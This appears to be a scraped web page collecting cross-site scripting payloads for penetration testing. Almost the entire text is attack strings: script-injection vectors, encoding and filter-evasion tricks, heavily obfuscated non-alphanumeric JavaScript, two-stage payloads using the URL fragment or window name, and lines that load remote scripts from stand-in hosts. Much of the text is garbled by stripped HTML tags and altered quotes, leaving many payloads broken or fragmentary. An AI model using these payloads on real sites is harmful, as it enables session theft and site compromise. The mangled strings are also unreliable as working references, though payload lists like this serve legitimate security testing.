Cross-Site Scripting (XSS) Payloads – Penetration Testing

Collection of Cross-Site Scripting (XSS) Payloads

>

;!–“=&{()}”

alert(“XSS”)”>

perl -e ‘print ““;’ > out

<alert(“XSS”);//<

\”;alert(‘XSS’);//

<IMG id=XSS SRC='javascript:alert('XSS')

alert(/XSS/.source)

alert(“XSS”);

@im\port’\ja\vasc\ript:alert(“XSS”)’;

alert(‘XSS’);

.XSS{background-image:url(“javascript:alert(‘XSS’)”);}

BODY{background:url(“javascript:alert(‘XSS’)”)}

a=”get”;b=”URL(\””;c=”javascript:”;d=”alert(‘XSS’);\”)”;eval(a+b+c+d);

<![CDATA[]]>

<IMG id=XSS SRC="javascript:alert(‘XSS’)”>

<t:set attributeName="innerHTML" to="XSSalert(“XSS”)”>

<? echo('alert(“XSS”)’); ?>

<META HTTP-EQUIV="Set-Cookie" Content="USERID=alert(‘XSS’)”>

http://127.0.0.1

//–>”>’>alert(String.fromCharCode(88,83,83))

<SCRIPT =alert(‘XSS’);”>

<IFRAME id=XSS SRC="javascript:alert('XSS'); <

a=/XSS/nalert(‘XSS’);

li {list-style-image: url(“javascript:alert(‘XSS’);

  • XSS

    +ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-

    ,

    &alert(‘XSS’);”>

    <a id=XSS href="about:alert(‘XSS’);”>

    <!–alert(‘XSS’);//–>

    ![CDATA[<!–]]alert(‘XSS’);//–>

    alert(‘XSS’);

    “onmouseover=”alert(‘XSS’);”>

    alert(‘XSS’);;

    [\xC0][\xBC]script>alert(‘XSS’);[\xC0][\xBC]/script>

    <![CDATA[<IMG id=XSS SRC="javas]]]]

    X

    <video id=XSS poster=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))//

    <iframe id=XSS onload=alert(/XSS/)>
    <iframe id=XSS onload=alert(/XSS/)>

    ” onfocus=alert(XSS) “>
    ” onclick=alert(XSS) “>

    li {list-style-image: url(\”javascript:alert(‘XSS’)\”);}

    • XSS
      ‘”>alert(XSS)

      ‘””> alert(‘X \nS \nS’);

      <<<>>><<alert(XSS)

      (XSS)(XSS)

      ‘>alert(XSS)

      }a=eval;b=alert;a(b(/XSS/.source));

      document.write(“XSS”);

      a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a+b+c+d);

      =’>alert(“xss”)

      alert(XSS)>

      data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

      alert(‘XSS’);
      ”;!–“=&{()}
      http://xxxx.com/xss.js






      id=XSS SRC=







      http://xxxx.com/xss.js
      <SCRIPT id=XSS SRC=http://xxxx.com/xss.js?
      <IMG id=XSS SRC="javascript:alert('XSS')"
      a=/XSS/
      \”;alert(‘XSS’);//


      @import’http://xxxx.com/xss.css&#8217;;
      <META HTTP-EQUIV="Link" Content="; REL=stylesheet”>
      BODY{-moz-binding:url(“http://ift.tt/2vUxMLk&#8221;)}


      <META HTTP-EQUIV="Link" Content="; REL=stylesheet”>

      @im\port’\ja\vasc\ript:alert(“XSS”)’;

      exp/*<XSS STYLE='no\xss:noxss("*//*");
      alert(‘XSS’);
      .XSS{background-image:url(“javascript:alert(‘XSS’)”);}
      BODY{background:url(“javascript:alert(‘XSS’)”)}

      getURL(“javascript:alert(‘XSS’)”)
      a=”get”;
      <!–<![CDATA[<![CDATA[<IMG id=XSS SRC="javas

      <!–#exec cmd="/bin/echo '‘”–>
      <? echo('<SCR)';
      <META HTTP-EQUIV="Set-Cookie" Content="USERID=alert(‘XSS’)”>
      +ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
      http://xxxx.com/xss.js
      http://xxxx.com/xss.js
      ‘” id=XSS SRC=”http://xxxx.com/xss.js”&gt;
      ` id=XSS SRC=”http://xxxx.com/xss.js”&gt;
      document.write(“<SCRI");PT id=XSS SRC=”http://xxxx.com/xss.js”&gt;

      alert(1)

      Null-byte character between HTML attribute name and equal sign (IE, Safari).

      Slash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).

      Vertical tab between HTML attribute name and equal sign (IE, Safari).

      Null-byte character between equal sign and JavaScript code (IE).

      Null-byte character between characters of HTML attribute names (IE).

      Null-byte character before characters of HTML element names (IE).

      Null-byte character after characters of HTML element names (IE, Safari).
      alert(1)

      Null-byte character between characters of HTML element names (IE).

      Use slashes instead of whitespace (IE, Firefox, Chrome, Safari).

      Use vertical tabs instead of whitespace (IE, Safari).

      Use quotes instead of whitespace in some situations (Safari).

      Use null-bytes instead of whitespaces in some situations (IE).

      Just don’t use spaces (IE, Firefox, Chrome, Safari).

      Prefix URI schemes.
      Firefox (\x09, \x0a, \x0d, \x20)
      Chrome (Any character \x01 to \x20)

      No greater-than characters needed (IE, Firefox, Chrome, Safari).
      <img src='1' onerror='alert(0)' <

      Extra less-than characters (IE, Firefox, Chrome, Safari).
      <alert(0)

      Backslash character between expression and opening parenthesis (IE).
      body{background-color:expression\(alert(1))}

      JavaScript Escaping
      document.write(‘blah‘);

      Encoding Galore.

      HTML Attribute Encoding



      URL Encoding

      CSS Hexadecimal Encoding (IE specific examples)

      Joker
      Joker
      Joker
      Joker

      JavaScript (hexadecimal, octal, and unicode)
      document.write(‘‘);
      document.write(‘\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E’);
      document.write(‘\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076’);
      document.write(‘\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E’);

      JavaScript (Decimal char codes)
      document.write(‘‘);
      document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));

      JavaScript (Unicode function and variable names)
      alert(123)
      \u0061\u006C\u0065\u0072\u0074(123)

      Overlong UTF-8 (SiteMinder is awesome!)
      = %C0%BE = %E0%80%BE = %F0%80%80%BE
      ‘ = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
      ” = %C0%A2 = %E0%80%A2 = %F0%80%80%A2


      %E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE

      UTF-7 (Missing charset?)

      +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-

      Unicode .NET Ugliness
      alert(1)
      %uff1cscript%uff1ealert(1)%uff1c/script%uff1e

      Classic ASP performs some unicode homoglyphic translations… don’t ask why…

      %u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A

      Useless and/or Useful features.

      HTML 5 (Not comprehensive)

      Usage of non-existent elements (IE)

      CSS Comments (IE)

      Alternate ways of executing JavaScript functions
      window[‘alert’](0)
      parent[‘alert’](1)
      self[‘alert’](2)
      top[‘alert’](3)

      Split up JavaScript into HTML attributes
      al

      HTML is parsed before JavaScript

      var junk = ‘alert(1)’;

      HTML is parsed before CSS

      body { background-image:url(‘http://www.blah.com/alert(1)&#8217;); }

      XSS in XML documents [doctype = text/xml] (Firefox, Chrome, Safari).

      URI Schemes

      (IE)
      <iframe src="data:text/html,alert(0)”> (Firefox, Chrome, Safari)
      (Firefox, Chrome, Safari)

      HTTP Parameter Pollution
      http://ift.tt/2qYc2vH
      ASP.NET a = val1,val2
      ASP a = val1,val2
      JSP a = val1
      PHP a = val2

      Two Stage XSS via fragment identifier (bypass length restrictions / avoid server logging)
      eval(location.hash.slice(1))
      eval(location.hash) (Firefox)

      http://ift.tt/2piuu5Weval(location.hash.slice(1))#alert(1)

      Two Stage XSS via name attribute
      <iframe src="http://ift.tt/2piuu5Weval(name)&#8221; name=”alert(1)”>

      Non-alphanumeric craziness…

      $=~[];$={___:++$,$$$$:(![]+””)[$],__$:++$,$_$_:(![]+””)[$],_$_:++$,$_$$:({}+””)[$],$$_$:($[$]+””)[$],_$$:++$,$$$_:(!””+””)[$],$__:++$,$_$:++$,$$__:({}+””)[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+””)[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+””)[$.__$])+((!$)+””)[$._$$]+($.__=$.$_[$.$$_])+($.$=(!””+””)[$.__$])+($._=(!””+””)[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!””+””)[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+”\””+$.$_$_+(![]+””)[$._$_]+$.$$$_+”\\”+$.__$+$.$$_+$._$_+$.__+”(“+$.___+”)”+”\””)())();

      (+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]
+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()









      <img src=N onerror=eval(javascript:document.write(unescape(' http://domain.js‘));)>
